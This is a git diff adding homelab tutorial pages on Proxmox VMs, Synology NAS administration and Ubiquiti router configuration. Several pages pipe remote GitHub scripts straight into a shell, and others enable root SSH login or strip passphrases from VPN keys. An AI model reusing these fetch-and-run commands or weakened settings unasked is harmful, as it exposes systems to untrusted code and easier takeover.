+╰─# bash <( curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh) 1 ↵
+ VMID NAME STATUS MEM( MB) BOOTDISK( GB) PID
+ 100 vm100 running 4096 40 .20 1113
+ 101 test stopped 2048 2 .20 0
+ 9000 ubuntu22-04-cloud stopped 2048 2 .20 0
+Enter the VM ID to be expanded: 101
+Enter the size to be expanded in GB ( example: 10G) : 5G
+VM ID 101 disk storage1 will be expanded by 5G
+Warning: There is currently no way to downsize the disk!
+Are you sure you want to expand the disk? ( yes/no) : yes
+
+Expanding the disk... Size of logical volume storage1/vm-101-disk-0 changed from <2 .20 GiB ( 563 extents) to <7 .20 GiB ( 1843 extents) .
+ Logical volume storage1/vm-101-disk-0 successfully resized.
+GPT:Primary header thinks Alt. header is not at the end of the disk.
+GPT:Alternate GPT header not at the end of the disk.
+GPT: Use GNU Parted to correct GPT errors.
+add map storage1-vm--101--disk--0p1 ( 253 :12) : 0 4384735 linear 253 :11 227328
+add map storage1-vm--101--disk--0p14 ( 253 :13) : 0 8192 linear 253 :11 2048
+add map storage1-vm--101--disk--0p15 ( 253 :14) : 0 217088 linear 253 :11 10240
+Warning: The kernel is still using the old partition table.
+The new table will be used at the next reboot or after you
+run partprobe( 8 ) or kpartx( 8 )
+The operation has completed successfully.
+
Limitations VM must be stopped to expand the disk. Currently supported only "cloud images" (or single ext4 partition installation) but if you still want to resize regular vm with LVM partition table, you need to extend the LVM partition INSIDE the vm AFTER running the script. Resizing LVM is done like this: $ lvm
+
+lvm> lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv
+lvm> exit
+
+$ resize2fs /dev/ubuntu-vg/ubuntu-lv
+
Resize of Ceph disks is currently not supported (PR are welcome!)
Back to top
\ No newline at end of file
diff --git a/infrastructure/proxmox/windows-vm-configuration/index.html b/infrastructure/proxmox/windows-vm-configuration/index.html
new file mode 100644
index 000000000..9b2033abb
--- /dev/null
+++ b/infrastructure/proxmox/windows-vm-configuration/index.html
@@ -0,0 +1,168 @@
+
Windows VM Configuration - 3os Proxmox Windows Virtual Machines VirtIO Proxmox Windows Virtual Machine Configuration This guide will walk you through configuring Windows 10 or Windows 11 Virtual Machines with VirtIO Disks and Networking using Proxmox. This configuration was tested to work with the GPU passthroughs
feature from one of the following guides:
Prerequirements Before we begin, we need to download the VirtIO Drivers for Windows iso
. Upload it via the GUI as any other ISO file.
You can allso use ssh and download it directly from the Proxmox server.
wget -P /var/lib/vz/template/iso https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/stable-virtio/virtio-win.iso
+
Create a VM in Proxmox Create a Virutal Machine in Proxmox as usual.
General Select Advanced
options.
OS Choose the iso file image for Windows 10 or 11. Change Type
to Microsoft Windows
and Version
to your's windows version.
System Change the Machine type to q35
, BIOS to UEFI
. Add TPM for Windows 11. Alocate Storage for UEFI BIOS and TPM.
Disks Set Bus/Device to VirtIO Block
and Cache to Write Through
. Select the storage disk and the VM's disk size.
CPU Choose how many cores you want to use. Set The cpu Type to Host
Memory Alocate the memory for the VM. Make sure the Ballooning Device
is enabled.
Network Select your preferred network interface. Set the Model to VirtIO (paravirtualized)
.
Confirm Don't Start the VM after creating it.
Add CD/DVD to VM We will need to use the VirtIO Drivers for Windows iso
file to install the drivers while installing the Windows VM.
Hardware Before Installation This how the hardware of the VM should look like befor starting the Windows installation.
Windows Installation The Windows installation process is the same as any other Windows OS installation. The only caveat is that you need to install the drivers for the Storage devices and Network devices.
Choose Custom: Install Windows only (advanced)
Missing Storage Devices When prompted to select the storage device to install windows the device won't show since we are using the VirtIO storage. Select Load Driver
.
Load the VirtIO Drivers Browse to the VirtIO Disk find a folder called viostor
and select the appropriate windows driver.
You should see the a Red Hat VirtIO driver selected. Click Next
and install the driver.
Continue with the installation as usual
Missing Network Driver Windows won't be able to load network drivers while installing. When prompted with something for connecting to the Internet, select I Don't have internet
and skip it. We will deal with the network drivers at post installation.
Post Installation Install all the VirtIO Drivers for Windows Open the VirtIO CD and run the virtio-win-gt-x64.exe
, virtio-win-guest-tools
installer. This will install all the missing virtio drivers for the VM and guest OS tools.
After the installtion your Device Manager should look like this without any errors.
Remove the VirtIO CD/DVD and Windows iso Power off the VM.
Remove the added CD/DVD for VirtIO iso.
Select Do nor use any media
on the CD/DVD with the Windows iso.
At this point we are done with the installation of the Windows VM.
Follow those guides for utilizing a GPU passthrough to VM:
GPU Passthrough to VM - Full GPU passthrough to VM guide iGPU Passthrough to VM - Cpu's GPU passthrough to VM guide (Intel) [GPU Split Passthrough][gpu-split-passthrough] - Splitting (Nvidia) to Multiple GPUs passthrough to VM guide
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/Install-oh-my-zsh/index.html b/infrastructure/synology/Install-oh-my-zsh/index.html
new file mode 100644
index 000000000..5693b0d62
--- /dev/null
+++ b/infrastructure/synology/Install-oh-my-zsh/index.html
@@ -0,0 +1,174 @@
+
oh-my-zsh on Synology NAS - 3os synology oh-my-zsh Authors: fire1ce | Created: 2021-09-01 | Last update: 2022-08-02 How to install oh-my-zsh on Synology NAS Introduction The following steps will instruct you how to install oh-my-zsh on Synology DSM NAS.
Whats' ZSH Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
What's Oh-My-Zsh Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
In order to install oh-my-zsh, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
DSM 6 and below:
Log into your NAS as administrator and go to Main Menu → Package Center → Settings and set Trust Level to Synology Inc. and trusted publishers.
In the Package Sources tab, click Add, type SynoCommunity as Name and https://packages.synocommunity.com/
as Location and then press OK to validate.
Go back to the Package Center and enjoy SynoCommunity's packages in the Community tab.
Install Z shell (with modules)
Install Z shell (with modules)
from package center Community tab.
Install Git
Install Git
from package center Community tab.
Change The Default Shell to ZSH
The following steps will be performed via SSH
edit ~/.profile
the file may be missing, so create it if it doesn't exist.
Append the codes below to the end of the file or add if empty.
if [[ -x /usr/local/bin/zsh ]] ; then
+ export SHELL = /usr/local/bin/zsh
+ exec /usr/local/bin/zsh
+fi
+
Open new SSH session to Synology NAS the shell should be zsh
Install Oh My Zsh From new SSH session with zsh
shell, install Oh My Zsh with the one of following command:
with curl:
sh -c " $( curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh) "
+
with wget:
sh -c " $( wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh) "
+
At this point you should have a working oh-my-zsh
working on your Synology NAS.
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/Installing-vm-tools-on-virtual-machine/index.html b/infrastructure/synology/Installing-vm-tools-on-virtual-machine/index.html
new file mode 100644
index 000000000..373de6329
--- /dev/null
+++ b/infrastructure/synology/Installing-vm-tools-on-virtual-machine/index.html
@@ -0,0 +1,171 @@
+
Install VM Tools on Virtual Machine - 3os synology Authors: fire1ce | Created: 2021-09-01 | Last update: 2022-08-02 On Debian:
sudo add-apt-repository universe
+sudo apt-get install qemu-guest-agent
+
On CentOS 7:
yum install -y qemu-guest-agent
+
On CentOS 8:
dnf install -y qemu-guest-agent
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/auto-dsm-config-backup/index.html b/infrastructure/synology/auto-dsm-config-backup/index.html
new file mode 100644
index 000000000..b7dd14c05
--- /dev/null
+++ b/infrastructure/synology/auto-dsm-config-backup/index.html
@@ -0,0 +1,168 @@
+
Auto DSM Config Backup - 3os synology Authors: fire1ce | Created: 2021-09-01 | Last update: 2022-08-02 Auto DSM Config Backup Since synology's dms doesn't provide any auto-backup for it's configuration i've made a smile script that can be run at from the "Task Scheduler". The script invokes synoconfbkp cli command that will dump the config file to provided folder. I use dropbox's folder in my case (This will sync my files to DropBox account). It append a date and hostname. It also checks the same folder for files older of 60 days and deletes them so your storage won't be flooded with files from older than 2 month. I've scheduled the script to run ounces a day with the "Task Scheduler"
To use it create new Task Scheduler choose a scheduler append the script to "Run Command" at "Task Settings" don't forget to change to destinations.
synoconfbkp export --filepath=/volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup/$(hostname)_$(date +%y%m%d).dss && find /volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup -type f -mtime +60 -exec rm -f {} \;
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/disable-dms-listening-on-80-443-ports/index.html b/infrastructure/synology/disable-dms-listening-on-80-443-ports/index.html
new file mode 100644
index 000000000..b590b7bb0
--- /dev/null
+++ b/infrastructure/synology/disable-dms-listening-on-80-443-ports/index.html
@@ -0,0 +1,179 @@
+
Free 80,443 Ports - 3os synology NAS ports Authors: fire1ce | Created: 2021-08-28 | Last update: 2022-08-05 Free 80,443 Ports On Synology NAS (DSM) Synology NAS (DSM) is a network storage device, with some additional features like native support for virtualization, and docker support. One of the issues is that the default ports 80 and 443 are used by the web server even if you change the default ports of the Synology's DSM to other ports. In some cases, you want to use these ports for other purposes, such as a reverse proxy as an entry point for the web services. The following steps will help you to free the default ports 80 and 443 on the Synology NAS (DSM) for other purposes.
First, you need to configure the Synology NAS (DSM) to listen on other ports then 80, 443.
Login to the Synology NAS (DSM) as administrator user open Control Panel
and find Login Portal
under System
Under DSM
tab, change the DSM port (http) to a different port then 80, and the DSM port (https) to a different port then 443.
Click Save
to save the changes. Then, re-login to the Synology NAS (DSM) with the new port as administrator user as we did above.
Disable the Synology NAS (DSM) to Listen on 80, 443 Ports Synology NAS (DSM) will listen on 80, 443 ports after each reboot. Therefore, the changes will be lost after each reboot. The workaround is to run the a script to free the ports 80, 443 on each time the Synology NAS (DSM) is boots.
The following one liner will free the ports 80, 443 on Nginx web server of the Synology NAS (DSM), until the Synology NAS (DSM) is rebooted. It removes the port 80, 443 from the Nginx
config and restarts the Nginx
service.
In order to persist the changes, we will create a Scheduled Task
to run the above script on each reboot.
Head to Control Panel
and find Task Scheduler
, then click Create
and select Triggerd Task
- User-defined script
.
At Create Task
- General
page, fill in the following information:
Task: Disable_DSM_Listening_on_80_443 User: root Event: Boot-up Pre-taks: None Enabled: Yes
At Task Settings
tab, under Run command
fill the User-defined script
with the following depending on Synology NAS (DSM) version:
Suggestion: Select the Notification when the task is terminated abnormally.
Click OK
. The new task should be created. You can check the task by clicking Run
in the Task Scheduler
page. Preferred to reboot the Synology NAS (DSM) to make sure the changes are applied at boot.
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/enable-ssh-root-login/index.html b/infrastructure/synology/enable-ssh-root-login/index.html
new file mode 100644
index 000000000..b1426a6a7
--- /dev/null
+++ b/infrastructure/synology/enable-ssh-root-login/index.html
@@ -0,0 +1,169 @@
+
Enable SSH Root Login - 3os synology ssh Authors: fire1ce | Created: 2023-01-05 | Last update: 2023-01-05 Enable Synology SSH Root Login Synology DSM allows Linux experts to use the SSH terminal. By default you need to log in as a user and then enter "sudo su root" can be inconvenient, but there is the option of logging in as root directly.
Section First, the DSM Control Panel is called up, Extended mode must be activated so that the required icon Terminal & SNMP appears. Under Terminal & SNMP the SSH-Service just can enable.
Connect to Synology dns with your admin user and password. Change user to root with the command "sudo su" and enter the Admins's password. Set the root
user password with the command below:
sudo synouser -setpw root 'new_root_password'
+
Edit the file /etc/ssh/sshd_config
and change the line PermitRootLogin no
to PermitRootLogin yes
.
sudo vi /etc/ssh/sshd_config
+
Reboot the Synology NAS to apply the changes.
Back to top
\ No newline at end of file
diff --git a/infrastructure/synology/ssh-with-rsa-key/index.html b/infrastructure/synology/ssh-with-rsa-key/index.html
new file mode 100644
index 000000000..ff78fcda9
--- /dev/null
+++ b/infrastructure/synology/ssh-with-rsa-key/index.html
@@ -0,0 +1,175 @@
+
SSH With RSA Keys - 3os synology dsm ssh rsa-keys Authors: fire1ce | Created: 2022-04-13 | Last update: 2022-04-24 Synology DSM - Allow Presistent SSH With RSA Keys As a power user, i would like to be able to connect to my Synology DSM vis SSH. The issue is that Synology DSM won't allow you to use SSH with RSA keys out of the box and only allows you to use SSH with password. In order to allow the use of SSH keys we need to perform the following steps:
Requirements I will assume you have already have SSH keys generated, SSH server configured on Synology DSM
Generated SSH keys SSH server configured on Synology DSM Allow User Home
at DSM Level User Home
enable to create a personal home folder for each user, except for guest. This will allow as to create user's .ssh
folder and authorized_keys
file.
Log into Synology web UI as an administrator user Control Panel -> User & Groups -> Advanced, scroll down to “User Home†Check “Enable user home serviceâ€, select an appropriate Location (i.e. volume1) Click “Applyâ€
Log in to the NAS through SSH with the user you want to add key authorization for. The following example shows how to add will work for the active user in the SSH session.
First change the permissins of the users home
folder to 700
Create the .ssh
folder and set permissions to 700
mkdir ~/.ssh && chmod 700 ~/.ssh
+
Create the authorized_keys
file and set permissions to 644
touch ~/.ssh/authorized_keys && chmod 644 ~/.ssh/authorized_keys
+
Synology's DSM SSH server supports RSA and ed25519 keys.
No you need to copy you public keys to authorized_keys
file, you can do it manually or use the following command:
echo <public-key-sting> >> ~/.ssh/authorized_keys
+
You can do it automatically by using the following command from a client with the ssh key you want to add:
ssh-copy-id -i ~/.ssh/id_rsa <user@ip-address>
+
At this point you should be able to connect to Synology DSM via SSH using the key you just added.
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/edge-router/index.html b/infrastructure/ubiquiti/edge-router/index.html
new file mode 100644
index 000000000..1d55b102c
--- /dev/null
+++ b/infrastructure/ubiquiti/edge-router/index.html
@@ -0,0 +1,316 @@
+
EdgeRouter - 3os ubiquiti edgerouter Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 EdgeRouter Clear DNS Forwarding Cache via SSH Call ssh user@192.168.1.1 'sudo /opt/vyatta/bin/sudo-users/vyatta-op-dns-forwarding.pl --clear-cache'
+
SSH via RSA keys SSH to the Edge Router: Copy the public key to /tmp folder
Run:
configure
+loadkey [ your user] /tmp/id_rsa.pub
+
Check that the keys are working by opening new session
Disable Password Authentication
set service ssh disable-password-authentication
+commit ; save
+
Done.
Enable Password Authentication if needed.
delete service ssh disable-password-authentication
+
Hardening EdgeRouter This will change the GUI to port 8443, disable old cyphers, Only will listen on internal Network. assuming your EdgeRouter IP is 192.168.1.1, if not change it accordingly.
SSH to the Edge Router
configure
+set service gui listen-address 192 .168.100.1
+set service gui https-port 8443
+set service gui older-ciphers disable
+set service ssh listen-address 192 .168.100.1
+set service ssh protocol-version v2
+set service ubnt-discover disable
+commit ; save
+
Hardware Offloading For Devices: ER-X / ER-X-SFP / EP-R6 Enable hwnat and ipsec offloading.
configure
+
+set system offload hwnat enable
+set system offload ipsec enable
+
+commit ; save
+
Disable hwnat and ipsec offloading.
configure
+
+set system offload hwnat disable
+set system offload ipsec disable
+
+commit ; save
+
For Devices: ER-4 / ER-6P / ERLite-3 / ERPoE-5 / ER-8 / ERPro-8 / EP-R8 / ER-8-XG Enable IPv4/IPv6 and ipsec offloading.
configure
+
+set system offload ipv4 forwarding enable
+set system offload ipv4 gre enable
+set system offload ipv4 pppoe enable
+set system offload ipv4 vlan enable
+
+set system offload ipv6 forwarding enable
+set system offload ipv6 pppoe enable
+set system offload ipv6 vlan enable
+
+set system offload ipsec enable
+
+commit ; save
+
Disable IPv4/IPv6 and ipsec offloading.
configure
+
+set system offload ipv4 forwarding disable
+set system offload ipv4 gre disable
+set system offload ipv4 pppoe disable
+set system offload ipv4 vlan disable
+
+set system offload ipv6 forwarding disable
+set system offload ipv6 pppoe disable
+set system offload ipv6 vlan disable
+
+set system offload ipsec disable
+
+commit ; save
+
Disable, Update /etc/hosts file on EdgeRouter Disable Auto DHCP hots:
configure
+set service dhcp-server hostfile-update disablecommit
+commit ; save
+
Update the Host File Manually:
configure
+set system static-host-mapping host-name mydomain.com inet 192 .168.1.10
+commit ; save
+
Show DNS Forwarding
configure
+show service dns forwarding
+
Show Hosts Config
Guest Wifi With Ubiquiti EdgeRouter and Unifi Access Points EdgeRouter Configuration From the Dashboard, click Add Interface and select VLAN.
Set up the VLAN ID as You like for this example will use id 1003 and attach it to the physical interface of your LAN. Give it an IP address in the range of a private IP block, but make sure you end it in a /24 to specify the proper subnet (I originally did /32 as I though it was supposed to be the exact IP address).
Click on the Services tab. Click Add DHCP Server. Set it up similar to the image below.
Click on the DNS tab under services. Click Add Listen interface and select the VLAN interface. Make sure you hit save.
At this point, you should be able to connect to your Guest Network and connect to the Internet. However, you’ll be able to access the EdgeRouter as well as other devices on your LAN. Next thing you have to do is secure the VLAN.
Click on Firewall/NAT and then click on Add Ruleset. This is for packets coming into the router destined for somewhere else (not the router). Set up the default policy for Accept. Click Save.
From the Actions menu next to the Ruleset, click Interfaces.
Select your VLAN interface and the in direction.
Click Rules and then Add New Rule. Click on Basic and name it LAN. Select Drop as the Action.
Click Destination and enter 10.0.1.0/24 or whatever your LAN IP range is. Then click Save. This will drop all packets from the VLAN destined for your LAN. Save.
Repeat 1 and 2 above (name it GUEST_LOCAL). From the Interface, select the VLAN interface and the local direction. However, set up the default policy as Drop.
Add a new rule. Set it to Accept on UDP port 53.
Save. Let's continue to set up the Uifi AP
Unifi Configuration If you want to limit your Guest Users Bandwidth, head over to User Groups and create a new user group called Guest. Enter bandwidth limits that are appropriate for your Internet Speed. I used 6000 down and 2500 up.
Now go to the Wireless Networks section and create a new network called “Guest†or whatever you want to call it.
Make sure it is enabled, give it WiFi security key, check the “Guest Policy†option, enter the VLAN Id you used previously and choose the Guest User Group. Save!
Done. Test Your New Guest Wifi by connecting to the Guest Wifi and browse to a website.
EdgeRouter OpenVPN Configuration 443/TCP This Guide is based on Original guide form ubnt support with modifications to the VPN port and protocol
For the purpose of this article, it is assumed that the routing and interface configurations are already in place and that reachability has been tested.
ssh to the EdgeRouter
Make sure that the date/time is set correctly on the EdgeRouter.
show date
+Thu Dec 28 14 :35:42 UTC 2017
+
Log in as the root user.
Generate a Diffie-Hellman (DH) key file and place it in the /config/auth directory. This Will take some time...
openssl dhparam -out /config/auth/dh.pem -2 4096
+
Change the current directory.
Generate a root certificate (replace with your desired passphrase).
exmaple:
PEM Passphrase: Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: root
Email Address: support@ubnt.com
NOTE: The Common Name needs to be unique for all certificates.
Copy the newly created certificate + key to the /config/auth directory.
cp demoCA/cacert.pem /config/auth
+cp demoCA/private/cakey.pem /config/auth
+
Generate the server certificate.
exmaple:
Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: server
Email Address: support@ubnt.com
Sign the server certificate.
if you want to change the certificate expiration day use: export default_days="3650" with the value of days you desire
Move and rename the server certificate + key to the /config/auth directory.
mv newcert.pem /config/auth/server.pem
+mv newkey.pem /config/auth/server.key
+
Generate, sign and move the client1 certificates.
Common Name: client1
./CA.pl -sign
+mv newcert.pem /config/auth/client1.pem
+mv newkey.pem /config/auth/client1.key
+
(Optional) Repeat the process for client2.
Common Name: client2
./CA.pl -sign
+mv newcert.pem /config/auth/client2.pem
+mv newkey.pem /config/auth/client2.key
+
Verify the contents of the /config/auth directory.
You should have those files:
cacert.pem cakey.pem client1.key client1.pem client2.key client2.pem dh.pem server.key server.pem Remove the password from the client + server keys. This allows the clients to connect using only the provided certificate.
openssl rsa -in /config/auth/server.key -out /config/auth/server-no-pass.key
+openssl rsa -in /config/auth/client1.key -out /config/auth/client1-no-pass.key
+openssl rsa -in /config/auth/client2.key -out /config/auth/client2-no-pass.key
+
Overwrite the existing keys with the no-pass versions.
mv /config/auth/server-no-pass.key /config/auth/server.key
+mv /config/auth/client1-no-pass.key /config/auth/client1.key
+mv /config/auth/client2-no-pass.key /config/auth/client2.key
+
Return to operational mode.
Enter configuration mode.
If EdgeRouter's Interface is on port 433, you must change it.
set service gui https-port 8443
+commit ; save
+
Add a firewall rule for the OpenVPN traffic to the local firewall policy.
set firewall name WAN_LOCAL rule 30 action accept
+set firewall name WAN_LOCAL rule 30 description OpenVPN
+set firewall name WAN_LOCAL rule 30 destination port 443
+set firewall name WAN_LOCAL rule 30 protocol tcp
+
Configure the OpenVPN virtual tunnel interface. push-route - the router for vpn connection name-server - default gateway of the route above
set interfaces openvpn vtun0 mode server
+set interfaces openvpn vtun0 server subnet 172 .16.1.0/24
+set interfaces openvpn vtun0 server push-route 192 .168.100.0/24
+set interfaces openvpn vtun0 server name-server 192 .168.100.1
+set interfaces openvpn vtun0 openvpn-option --duplicate-cn
+set interfaces openvpn vtun0 local-port 443
+edit interfaces openvpn vtun0
+set openvpn-option "--push redirect-gateway"
+set protocol tcp-passive
+commit ; save
+
Link the server certificate/keys and DH key to the virtual tunnel interface.
set interfaces openvpn vtun0 tls ca-cert-file /config/auth/cacert.pem
+set interfaces openvpn vtun0 tls cert-file /config/auth/server.pem
+set interfaces openvpn vtun0 tls key-file /config/auth/server.key
+set interfaces openvpn vtun0 tls dh-file /config/auth/dh.pem
+commit ; save
+
Add DNS forwarding to the new vlan vtun0 to get DNS resolving.
Exmaple for clinet.opvn Config client
+dev tun
+proto udp
+remote <server-ip or hostname> 443
+float
+resolv-retry infinite
+nobind
+persist-key
+persist-tun
+verb 3
+ca cacert.pem
+cert client1.pem
+key client1.key
+
EdgeRouter Free Up space by Cleaning Old Firmware ssh to the EdgeRouter:
SpeedTest Cli on Edge Router ssh to the Edge Router. installation:
curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py
+chmod +x speedtest-cli
+
run from the same directory:
./speedtest-cli --no-pre-allocate
+
based on https://github.com/sivel/speedtest-cli
Enable NetFlow on EdgeRouter to UNMS The most suitable place to enable NetFlow is your Default gateway router. UNMS supports NetFlow version 5 and 9. UNMS only record flow data for IP ranges defined below. Whenever UNMS receives any data from a router, the status of NetFlow changes to Active
.
To show interfaces and pick the right interface:\
Example configuration for EdgeRouter:
configure
+set system flow-accounting interface pppoe0
+set system flow-accounting ingress-capture post-dnat
+set system flow-accounting disable-memory-table
+set system flow-accounting netflow server 192 .168.1.10 port 2055
+set system flow-accounting netflow version 9
+set system flow-accounting netflow engine-id 0
+set system flow-accounting netflow enable-egress engine-id 1
+set system flow-accounting netflow timeout expiry-interval 60
+set system flow-accounting netflow timeout flow-generic 60
+set system flow-accounting netflow timeout icmp 60
+set system flow-accounting netflow timeout max-active-life 60
+set system flow-accounting netflow timeout tcp-fin 10
+set system flow-accounting netflow timeout tcp-generic 60
+set system flow-accounting netflow timeout tcp-rst 10
+set system flow-accounting netflow timeout udp 60
+commit
+save
+
10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 100.64.0.0/10
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/cli-commands/index.html b/infrastructure/ubiquiti/udm-dream-machine/cli-commands/index.html
new file mode 100644
index 000000000..c1317d6e3
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/cli-commands/index.html
@@ -0,0 +1,171 @@
+
CLI Commands - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 UDM CLI Commands List Collection of CLI commands for the Ubiquiti Unifi Dream Machine or Dream Machine Pro.
Common UDM Commands Open shell to unifi podman container (udm pro)
Show Sensors information including: UDM temperature, fan speed, and voltage.
Show ARP Table
Display All Listening Ports on the UDM Device
UDM Commands List Collection of commands for your Unifi Dream Machine or Dream Machine Pro.
Description UDM/UDM-P SSH Command show DHCP leases (to NSname) cat /mnt/data/udapi-config/dnsmasq.lease show version info show system hardware and installed software ubnt-device-info summary show cpu tempeture ubnt-systool cputemp show fan speed ubnt-fan-speed show uptime uptime show ip route netstat -rt -n show ppp summery pppstats show current user whoami show log cat /var/log/messages show interface summary ifstat show interfaces ifconfig show other Ubiquiti devices on local LAN segment (ubnt-discovery) ubnt-tools ubnt-discover show config (wireless) cat /mnt/data/udapi-config/unifi packet capture tcpdump shutdown poweroff reload reboot show ipsec sa ipsec statusall factory reset factory-reset.sh show system burnt in MAC address ubnt-tools hwaddr show unifi server logs cat /mnt/data/unifi-os/unifi/logs/server.log show unifi server setttings cat /mnt/data/unifi-os/unifi-core/config/settings.yaml show unifi server http logs cat /mnt/data/unifi-os/unifi-core/logs/http.log show unifi server http logs (errors) cat /mnt/data/unifi-os/unifi-core/logs/errors.log show unifi server discovery log cat /mnt/data/unifi-os/unifi-core/logs/discovery.log show unifi system logs cat /mnt/data/unifi-os/unifi-core/logs/system.log Restarts the UnifiOS Web interface /etc/init.d/S95unifios restart show ip arp (show arp) and IPv6 neighbours arp -a OR ip neigh show tunnel interfaces ip tunnel show Show Sensors information sensors Open shell to unifi podman container unifi-os shell tcpdump tcpdump -w
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/index.html b/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/index.html
new file mode 100644
index 000000000..fa5ad7607
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/index.html
@@ -0,0 +1,172 @@
+
Failover Telegram Notifications - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 UDM WAN Failover Telegram Notifications This script will send a message to a Telegram chat when WAN connection is changed to failover and back to normal.
Github Repository: UDM Failover Telegram Notifications
Changelog 2023-02-22 - Added support for multiple UDM versions 1.x, 2.x and 3.x Persistence on Reboot This script need to run every time the system is rebooted since the UDM overwrites crons every boot. This can be accomplished with a boot script. Flow this guide: UDM / UDMPro Boot Script
Compatibility Installation curl -s https://raw.githubusercontent.com/fire1ce/UDM-Failover-Telegram-Notifications/main/install.sh | sh
+
Set your Telegram Chat ID and Bot API Key at
$DATA_DIR for 1.x = /mnt/data $DATA_DIR for 2.x and 3.x = /data
$DATA_DIR /UDMP-Failover-Telegram-Notifications/failover-notifications.sh
+
Config Parameters Description telegram_bot_API_Token Telegram Bot API Token telegram_chat_id Chat ID of the Telegram Bot echo_server_ip IP of a server to test what interface is active (Default 1.1.1.1) run_interval Interval to run a failover check (Default 60 seconds)
Uninstall Delete the UDMP-Failover-Telegram-Notifications folder
rm -rf $DATA_DIR /UDMP-Failover-Telegram-Notifications
+
Delete on boot script file
rm -rf $DATA_DIR /on_boot.d/99-failover-telegram-notifications.sh
+
Usage At boot the script with create a cronjob that will run once. This is done to prevent boot blocking.
Manual run to test notifications:
$DATA_DIR /UDMP-Failover-Telegram-Notifications/failover-notifications.sh
+
It's strongly recommended to perform a reboot in order to check the on boot initialization of the notifications
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/index.html b/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/index.html
new file mode 100644
index 000000000..9dba9a340
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/index.html
@@ -0,0 +1,168 @@
+
Persistent Boot Script - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 Persistent On Boot Script When UDM or UDM PRO reboots or the firmawre is updated the custom changes you made will be lost. This Script will allow you to initialize your custom changes on every boot or firmware update. without losing your custom changes.
Github Repository: unifios-utilities - on-boot-script
Features Allows you to run a shell script at S95 anytime your UDM starts / reboots Persists through reboot and firmware updates ! It is able to do this because Ubiquiti caches all debian package installs on the UDM in /data, then re-installs them on reset of unifi-os container. Install You can execute in UDM/Pro/SE and UDR with:
curl -fsL "https://raw.githubusercontent.com/unifi-utilities/unifios-utilities/HEAD/on-boot-script/remote_install.sh" | /bin/sh
+
This is a force to install script so will uninstall any previous version and install on_boot keeping your on boot files.
This will also install CNI Plugins & CNI Bridge scripts. If you are using UDMSE/UDR remember that you must install podman manually because there is no podman.
For manual installation see: The Github Readme
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/index.html b/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/index.html
new file mode 100644
index 000000000..00fd03e3b
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/index.html
@@ -0,0 +1,172 @@
+
Persistent SSH Keys - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-06-25 UDM Persistent SSH Keys UDM will discard any Authorized Keys for SSH every reboot or firmware upgrade. This script will allow you to persist your SSH keys in the UDM and survive reboots.
Github Repository: UDM Persistent SSH Keys
Changelog 2023-02-22 - Fixed support for UDM Pro Firmware 1.x and 2.x and 3.x - Must reinstall the script after upgrade from 1.x to 2.x Persistence on Reboot This script need to run every time the system is rebooted since the /root/.ssh/authorized_keys overwrites every boot. This can be accomplished with a boot script. Flow this guide: UDM / UDMPro Boot Script
Compatibility Tested on UDM PRO UDM Pro doesn't support ed25519 SSH Keys Installation The script was tested on UDM PRO
(!) Depending on firmware your $DATA_DIR
will be /mnt/data
(Firmware 1.x) or /data
(Firmware 2.x and 3.x)
curl -s https://raw.githubusercontent.com/fire1ce/UDM-Persistent-SSH-Keys/main/install.sh | sh
+
Add you public RSA keys to:
$DATA_DIR /ssh/authorized_keys
+
Uninstall Delete the 99-ssh-keys.sh file
rm -rf $DATA_DIR /on_boot.d/99-ssh-keys.sh
+
Delete your authorized_keys file
rm -rf $DATA_DIR /ssh/authorized_keys
+
Usage At boot the script with read the $DATA_DIR/ssh/authorized_keys file and add the content to UDM's /root/.ssh/authorized_keys
Manual run:
$DATA_DIR /on_boot.d/99-ssh-keys.sh
+
Back to top
\ No newline at end of file
